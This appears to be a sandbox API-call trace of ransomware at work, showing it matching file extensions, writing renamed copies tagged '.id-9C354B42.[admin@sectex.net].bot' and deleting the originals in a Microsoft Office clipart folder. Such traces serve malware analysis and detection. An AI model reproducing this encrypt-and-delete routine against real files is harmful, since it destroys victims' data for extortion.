	[0163.658] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0163.658] lstrlenW (lpString=".xls") returned 4
	[0163.658] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0163.658] lstrlenW (lpString=".xlsx") returned 5
	[0163.658] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0163.658] lstrlenW (lpString=".ppt") returned 4
	[0163.658] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0163.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.658] lstrlenW (lpString=".zip") returned 4
	[0163.658] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0163.658] lstrlenW (lpString=".rar") returned 4
	[0163.658] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0163.658] lstrlenW (lpString=".bz2") returned 4
	[0163.658] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0163.658] lstrlenW (lpString=".7z") returned 3
	[0163.658] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0163.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.658] lstrlenW (lpString=".dbf") returned 4
	[0163.659] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0163.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.659] lstrlenW (lpString=".1cd") returned 4
	[0163.659] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0163.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 63
	[0163.659] lstrlenW (lpString=".jpg") returned 4
	[0163.659] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0163.659] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.659] lstrlenW (lpString="J0150861.WMF") returned 12
	[0163.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150861.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.659] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=8494) returned 1
	[0163.660] CloseHandle (hObject=0x398) returned 1
	[0163.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150861.wmf")) returned 0x20
	[0163.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150861.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150861.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.660] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.660] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150861.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0163.661] GetLastError () returned 0x0
	[0163.661] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x212e, lpOverlapped=0x0) returned 1
	[0163.665] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2130, lpOverlapped=0x0) returned 1
	[0163.666] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.666] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.666] SetEndOfFile (hFile=0x388) returned 1
	[0163.666] CloseHandle (hObject=0x388) returned 1
	[0163.666] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.666] SetEndOfFile (hFile=0x398) returned 1
	[0163.669] CloseHandle (hObject=0x398) returned 1
	[0163.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.669] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150861.wmf")) returned 1
	[0163.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.670] lstrlenW (lpString=".doc") returned 4
	[0163.670] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.670] lstrlenW (lpString=".docx") returned 5
	[0163.670] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0163.670] lstrlenW (lpString=".pdf") returned 4
	[0163.670] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.670] lstrlenW (lpString=".xls") returned 4
	[0163.670] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.670] lstrlenW (lpString=".xlsx") returned 5
	[0163.670] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0163.670] lstrlenW (lpString=".ppt") returned 4
	[0163.670] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.670] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.670] lstrlenW (lpString=".zip") returned 4
	[0163.670] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.670] lstrlenW (lpString=".rar") returned 4
	[0163.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.671] lstrlenW (lpString=".bz2") returned 4
	[0163.671] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.671] lstrlenW (lpString=".7z") returned 3
	[0163.671] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.671] lstrlenW (lpString=".dbf") returned 4
	[0163.671] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.671] lstrlenW (lpString=".1cd") returned 4
	[0163.671] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.671] lstrlenW (lpString=".jpg") returned 4
	[0163.671] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.671] lstrlenW (lpString=".doc") returned 4
	[0163.671] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.671] lstrlenW (lpString=".docx") returned 5
	[0163.671] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0163.671] lstrlenW (lpString=".pdf") returned 4
	[0163.671] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.671] lstrlenW (lpString=".xls") returned 4
	[0163.671] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.671] lstrlenW (lpString=".xlsx") returned 5
	[0163.671] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0163.671] lstrlenW (lpString=".ppt") returned 4
	[0163.671] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.671] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.671] lstrlenW (lpString=".zip") returned 4
	[0163.671] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.671] lstrlenW (lpString=".rar") returned 4
	[0163.671] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.671] lstrlenW (lpString=".bz2") returned 4
	[0163.671] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.672] lstrlenW (lpString=".7z") returned 3
	[0163.672] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.672] lstrlenW (lpString=".dbf") returned 4
	[0163.672] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.672] lstrlenW (lpString=".1cd") returned 4
	[0163.672] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned 63
	[0163.672] lstrlenW (lpString=".jpg") returned 4
	[0163.672] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.672] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.672] lstrlenW (lpString="J0151041.WMF") returned 12
	[0163.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151041.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.689] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=4356) returned 1
	[0163.689] CloseHandle (hObject=0x398) returned 1
	[0163.689] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151041.wmf")) returned 0x20
	[0163.689] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151041.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151041.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0163.690] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.690] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151041.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0163.690] GetLastError () returned 0x0
	[0163.690] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1104, lpOverlapped=0x0) returned 1
	[0163.805] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1110, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1110, lpOverlapped=0x0) returned 1
	[0163.806] ReadFile (in: hFile=0x398, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.806] WriteFile (in: hFile=0x388, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.806] SetEndOfFile (hFile=0x388) returned 1
	[0163.806] CloseHandle (hObject=0x388) returned 1
	[0163.806] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.806] SetEndOfFile (hFile=0x398) returned 1
	[0163.808] CloseHandle (hObject=0x398) returned 1
	[0163.809] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.851] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151041.wmf")) returned 1
	[0163.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.851] lstrlenW (lpString=".doc") returned 4
	[0163.852] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.852] lstrlenW (lpString=".docx") returned 5
	[0163.852] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0163.852] lstrlenW (lpString=".pdf") returned 4
	[0163.852] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.852] lstrlenW (lpString=".xls") returned 4
	[0163.852] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.852] lstrlenW (lpString=".xlsx") returned 5
	[0163.852] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0163.852] lstrlenW (lpString=".ppt") returned 4
	[0163.852] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.852] lstrlenW (lpString=".zip") returned 4
	[0163.852] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.852] lstrlenW (lpString=".rar") returned 4
	[0163.852] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.852] lstrlenW (lpString=".bz2") returned 4
	[0163.852] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.852] lstrlenW (lpString=".7z") returned 3
	[0163.852] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.852] lstrlenW (lpString=".dbf") returned 4
	[0163.852] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.852] lstrlenW (lpString=".1cd") returned 4
	[0163.852] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.852] lstrlenW (lpString=".jpg") returned 4
	[0163.852] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.852] lstrlenW (lpString=".doc") returned 4
	[0163.852] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.853] lstrlenW (lpString=".docx") returned 5
	[0163.853] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0163.853] lstrlenW (lpString=".pdf") returned 4
	[0163.853] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.853] lstrlenW (lpString=".xls") returned 4
	[0163.853] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.853] lstrlenW (lpString=".xlsx") returned 5
	[0163.853] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0163.853] lstrlenW (lpString=".ppt") returned 4
	[0163.853] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.853] lstrlenW (lpString=".zip") returned 4
	[0163.853] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.853] lstrlenW (lpString=".rar") returned 4
	[0163.853] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.853] lstrlenW (lpString=".bz2") returned 4
	[0163.853] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.853] lstrlenW (lpString=".7z") returned 3
	[0163.853] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.853] lstrlenW (lpString=".dbf") returned 4
	[0163.853] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.853] lstrlenW (lpString=".1cd") returned 4
	[0163.853] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned 63
	[0163.853] lstrlenW (lpString=".jpg") returned 4
	[0163.853] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.853] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.853] lstrlenW (lpString="J0151061.WMF") returned 12
	[0163.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151061.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0164.101] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=6752) returned 1
	[0164.101] CloseHandle (hObject=0x388) returned 1
	[0164.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151061.wmf")) returned 0x20
	[0164.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151061.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151061.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0164.102] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.102] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151061.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.331] GetLastError () returned 0x0
	[0164.331] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1a60, lpOverlapped=0x0) returned 1
	[0164.353] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1a70, lpOverlapped=0x0) returned 1
	[0164.354] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.354] WriteFile (in: hFile=0x3d0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.355] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.355] CloseHandle (hObject=0x3d0) returned 1
	[0164.355] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.355] SetEndOfFile (hFile=0x388) returned 1
	[0164.357] CloseHandle (hObject=0x388) returned 1
	[0164.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.357] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151061.wmf")) returned 1
	[0164.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.358] lstrlenW (lpString=".doc") returned 4
	[0164.358] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.358] lstrlenW (lpString=".docx") returned 5
	[0164.358] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0164.358] lstrlenW (lpString=".pdf") returned 4
	[0164.358] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.358] lstrlenW (lpString=".xls") returned 4
	[0164.358] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.358] lstrlenW (lpString=".xlsx") returned 5
	[0164.358] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0164.358] lstrlenW (lpString=".ppt") returned 4
	[0164.358] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.358] lstrlenW (lpString=".zip") returned 4
	[0164.358] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.358] lstrlenW (lpString=".rar") returned 4
	[0164.358] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.358] lstrlenW (lpString=".bz2") returned 4
	[0164.358] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.358] lstrlenW (lpString=".7z") returned 3
	[0164.359] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.359] lstrlenW (lpString=".dbf") returned 4
	[0164.359] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.359] lstrlenW (lpString=".1cd") returned 4
	[0164.359] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.359] lstrlenW (lpString=".jpg") returned 4
	[0164.359] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.359] lstrlenW (lpString=".doc") returned 4
	[0164.359] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.359] lstrlenW (lpString=".docx") returned 5
	[0164.359] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0164.359] lstrlenW (lpString=".pdf") returned 4
	[0164.359] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.359] lstrlenW (lpString=".xls") returned 4
	[0164.359] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.359] lstrlenW (lpString=".xlsx") returned 5
	[0164.359] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0164.359] lstrlenW (lpString=".ppt") returned 4
	[0164.359] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
